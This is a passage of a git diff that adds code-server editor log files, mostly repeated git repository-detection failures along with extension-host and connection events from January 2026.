> git rev-parse --show-toplevel [3ms] +2026-01-29 21:39:44.625 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:41:12.243 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 21:41:12.243 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:41:50.554 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:41:50.554 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:42:35.041 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:42:35.041 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:42:35.589 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:42:35.589 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:42:36.274 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:42:36.274 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..2a5db5f --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-29 21:35:39.373 [info] Reading sessions from keychain... +2026-01-29 21:35:39.373 [info] Getting sessions for all scopes... +2026-01-29 21:35:39.373 [info] Got 0 sessions for ... +2026-01-29 21:35:39.373 [info] Getting sessions for all scopes... +2026-01-29 21:35:39.373 [info] Got 0 sessions for ... +2026-01-29 21:35:39.373 [info] Getting sessions for all scopes... +2026-01-29 21:35:39.373 [info] Got 0 sessions for ... +2026-01-29 21:35:39.373 [info] Getting sessions for all scopes... +2026-01-29 21:35:39.373 [info] Got 0 sessions for ... +2026-01-29 21:35:39.373 [info] Getting sessions for all scopes... +2026-01-29 21:35:39.373 [info] Got 0 sessions for ... +2026-01-29 21:35:39.373 [info] Getting sessions for all scopes... +2026-01-29 21:35:39.373 [info] Got 0 sessions for ... +2026-01-29 21:35:39.373 [info] Getting sessions for all scopes... +2026-01-29 21:35:39.373 [info] Got 0 sessions for ... +2026-01-29 21:35:39.373 [info] Getting sessions for all scopes... +2026-01-29 21:35:39.373 [info] Got 0 sessions for ... +2026-01-29 21:35:39.373 [info] Getting sessions for all scopes... +2026-01-29 21:35:39.373 [info] Got 0 sessions for ... +2026-01-29 21:35:39.457 [info] Getting sessions for all scopes... +2026-01-29 21:35:39.457 [info] Got 0 sessions for ... +2026-01-29 21:35:39.501 [info] Getting sessions for all scopes... +2026-01-29 21:35:39.501 [info] Got 0 sessions for ... +2026-01-29 21:35:39.502 [info] Getting sessions for all scopes... +2026-01-29 21:35:39.502 [info] Got 0 sessions for ... +2026-01-29 21:35:39.502 [info] Getting sessions for all scopes... +2026-01-29 21:35:39.502 [info] Got 0 sessions for ... +2026-01-29 21:35:39.502 [info] Getting sessions for all scopes... +2026-01-29 21:35:39.502 [info] Got 0 sessions for ... +2026-01-29 21:35:39.502 [info] Getting sessions for all scopes... +2026-01-29 21:35:39.502 [info] Got 0 sessions for ... +2026-01-29 21:35:41.061 [info] Getting sessions for all scopes... +2026-01-29 21:35:41.061 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.github/GitHub.log new file mode 100755 index 0000000..279ff5e --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-29 21:35:39.561 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260129T213246/ptyhost.log b/.vscode_config/.local/share/code-server/logs/20260129T213246/ptyhost.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T213246/remoteTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260129T213246/remoteTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T213246/remoteagent.log b/.vscode_config/.local/share/code-server/logs/20260129T213246/remoteagent.log new file mode 100755 index 0000000..bf6d243 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T213246/remoteagent.log @@ -0,0 +1,13 @@ +2026-01-29 21:32:46.723 [info] + + + + +2026-01-29 21:32:46.738 [info] Extension host agent started. +2026-01-29 21:32:46.780 [error] [192.168.100.179][713309c9][ExtensionHostConnection] Unknown reconnection token (never seen). +2026-01-29 21:32:48.255 [error] [192.168.100.179][ce4fbe60][ManagementConnection] Unknown reconnection token (never seen). +2026-01-29 21:35:37.600 [info] [192.168.100.179][fc5af76c][ManagementConnection] New connection established. +2026-01-29 21:35:38.363 [info] [192.168.100.179][9f4b60a3][ExtensionHostConnection] New connection established. +2026-01-29 21:35:38.404 [info] [192.168.100.179][9f4b60a3][ExtensionHostConnection] <530> Launched Extension Host Process. +2026-01-29 21:35:38.653 [info] [192.168.100.179][9f4b60a3][ExtensionHostConnection] <530> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/remoteexthost.log new file mode 100755 index 0000000..2d00f0f --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/remoteexthost.log @@ -0,0 +1,35 @@ +2026-01-29 21:56:10.284 [info] Extension host with pid 536 started +2026-01-29 21:56:10.284 [error] Error: EEXIST: file already exists, open '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock' +2026-01-29 21:56:10.285 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Could not acquire lock, checking if the file is stale. +2026-01-29 21:56:10.286 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': The pid 530 appears to be gone. +2026-01-29 21:56:10.287 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Deleting a stale lock. +2026-01-29 21:56:10.298 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-01-29 21:56:10.516 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-29 21:56:10.517 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-29 21:56:10.633 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-29 21:56:10.649 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-29 21:56:10.649 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-29 21:56:10.833 [info] Eager extensions activated +2026-01-29 21:56:10.834 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-29 21:56:10.834 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-29 21:56:10.867 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-29 22:07:51.896 [info] ExtensionService#_doActivateExtension vscode.typescript-language-features, startup: false, activationEvent: 'onLanguage:javascript' +2026-01-29 22:08:15.554 [info] ExtensionService#_doActivateExtension vscode.css-language-features, startup: false, activationEvent: 'onLanguage:css' +2026-01-30 00:24:07.599 [info] ExtensionService#_doActivateExtension vscode.html-language-features, startup: false, activationEvent: 'onLanguage:html' +2026-01-30 02:08:29.793 [error] Error: read ECONNRESET + at TCP.onStreamRead (node:internal/stream_base_commons:216:20) +2026-01-30 05:08:43.373 [info] Extension host terminating: renderer disconnected for too long (1) +2026-01-30 05:08:43.375 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-30 05:08:43.419 [error] ProxyResolver#resolveProxy undefined Canceled: Canceled + at su (file:///usr/lib/code-server/lib/vscode/out/vs/workbench/api/node/extensionHostProcess.js:7:1394) + at file:///usr/lib/code-server/lib/vscode/out/vs/workbench/api/node/extensionHostProcess.js:29:128146 + at Array.forEach () + at AE.dispose (file:///usr/lib/code-server/lib/vscode/out/vs/workbench/api/node/extensionHostProcess.js:29:128086) + at IK.terminate (file:///usr/lib/code-server/lib/vscode/out/vs/workbench/api/node/extensionHostProcess.js:120:10208) + at UM.terminate (file:///usr/lib/code-server/lib/vscode/out/vs/workbench/api/node/extensionHostProcess.js:122:914) + at Br (file:///usr/lib/code-server/lib/vscode/out/vs/workbench/api/node/extensionHostProcess.js:405:11136) + at Sx.a (file:///usr/lib/code-server/lib/vscode/out/vs/workbench/api/node/extensionHostProcess.js:405:7970) + at Sx.h (file:///usr/lib/code-server/lib/vscode/out/vs/workbench/api/node/extensionHostProcess.js:28:76725) + at listOnTimeout (node:internal/timers:588:17) + at process.processTimers (node:internal/timers:523:7) +2026-01-30 05:08:43.448 [info] Extension host with pid 536 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.css-language-features/CSS Language Server.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.css-language-features/CSS Language Server.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.git/Git.log new file mode 100755 index 0000000..67144f6 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.git/Git.log @@ -0,0 +1,458 @@ +2026-01-29 21:56:10.980 [info] [main] Log level: Info +2026-01-29 21:56:10.980 [info] [main] Validating found git in: "git" +2026-01-29 21:56:10.980 [info] [main] Using git "2.39.5" from "git" +2026-01-29 21:56:10.980 [info] [Model][doInitialScan] Initial repository scan started +2026-01-29 21:56:10.980 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:56:10.980 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:56:10.980 [info] > git rev-parse --show-toplevel [26ms] +2026-01-29 21:56:10.980 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:56:10.980 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 21:56:10.980 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:56:10.985 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:56:10.985 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:56:10.990 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:56:10.990 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:56:10.994 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:56:10.994 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:56:10.999 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:56:10.999 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:56:11.004 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:56:11.004 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:56:11.009 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:56:11.009 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:56:11.013 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:56:11.013 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:56:11.017 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:56:11.017 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:56:11.022 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:56:11.022 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:56:11.036 [info] > git rev-parse --show-toplevel [11ms] +2026-01-29 21:56:11.036 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:56:11.039 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-29 21:56:11.044 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:56:11.044 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:56:11.965 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:56:11.965 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:56:14.325 [info] > git rev-parse --show-toplevel [9ms] +2026-01-29 21:56:14.325 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:01:21.740 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:01:21.740 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:02:50.626 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 22:02:50.626 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:02:50.631 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:02:50.631 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:02:50.636 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:02:50.636 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:02:50.641 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:02:50.641 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:02:50.647 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 22:02:50.647 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:02:50.652 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:02:50.652 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:02:50.658 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:02:50.658 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:02:50.663 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:02:50.663 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:02:50.669 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:02:50.669 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:02:50.675 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:02:50.675 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:02:50.681 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:02:50.681 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:02:50.687 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:02:50.687 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:02:50.693 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:02:50.693 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:02:50.699 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:02:50.699 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:03:11.077 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 22:03:11.077 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:03:25.808 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 22:03:25.809 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:04:07.021 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 22:04:07.021 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:07:51.984 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 22:07:51.984 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:08:15.629 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 22:08:15.629 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:08:36.625 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:08:36.625 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:09:11.716 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 22:09:11.716 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:10:11.612 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 22:10:11.612 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:55:30.884 [info] > git rev-parse --show-toplevel [0ms] +2026-01-29 22:55:30.884 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:56:05.442 [info] > git rev-parse --show-toplevel [0ms] +2026-01-29 22:56:05.442 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:56:43.641 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 22:56:43.641 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:56:44.812 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:56:44.812 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:56:46.808 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:56:46.808 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:57:36.502 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 22:57:36.502 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 22:59:03.494 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 22:59:03.494 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:01:10.714 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 23:01:10.714 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:06:38.105 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:06:38.105 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:08:56.644 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:08:56.644 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:09:19.653 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:09:19.653 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:11:47.725 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:11:47.725 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:11:58.674 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:11:58.674 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:12:54.341 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:12:54.341 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:14:59.074 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:14:59.074 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:15:15.907 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 23:15:15.907 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:15:29.554 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:15:29.554 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:15:48.673 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 23:15:48.673 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:17:07.199 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:17:07.199 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:17:26.742 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:17:26.742 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:18:43.721 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:18:43.721 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:19:21.917 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:19:21.918 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:19:27.807 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:19:27.807 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:20:46.902 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:20:46.902 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:21:01.829 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:21:01.829 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:21:02.567 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:21:02.567 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:21:03.240 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:21:03.240 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:21:16.060 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 23:21:16.060 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:22:28.531 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:22:28.531 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:23:15.201 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:23:15.201 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:23:35.290 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:23:35.290 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:23:37.427 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:23:37.427 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:23:38.586 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:23:38.586 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:23:42.290 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 23:23:42.290 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:23:58.481 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:23:58.482 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:24:22.084 [info] > git rev-parse --show-toplevel [7ms] +2026-01-29 23:24:22.084 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:26:57.744 [info] > git rev-parse --show-toplevel [9ms] +2026-01-29 23:26:57.744 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 23:27:06.150 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 23:27:06.150 [info] fatal: not 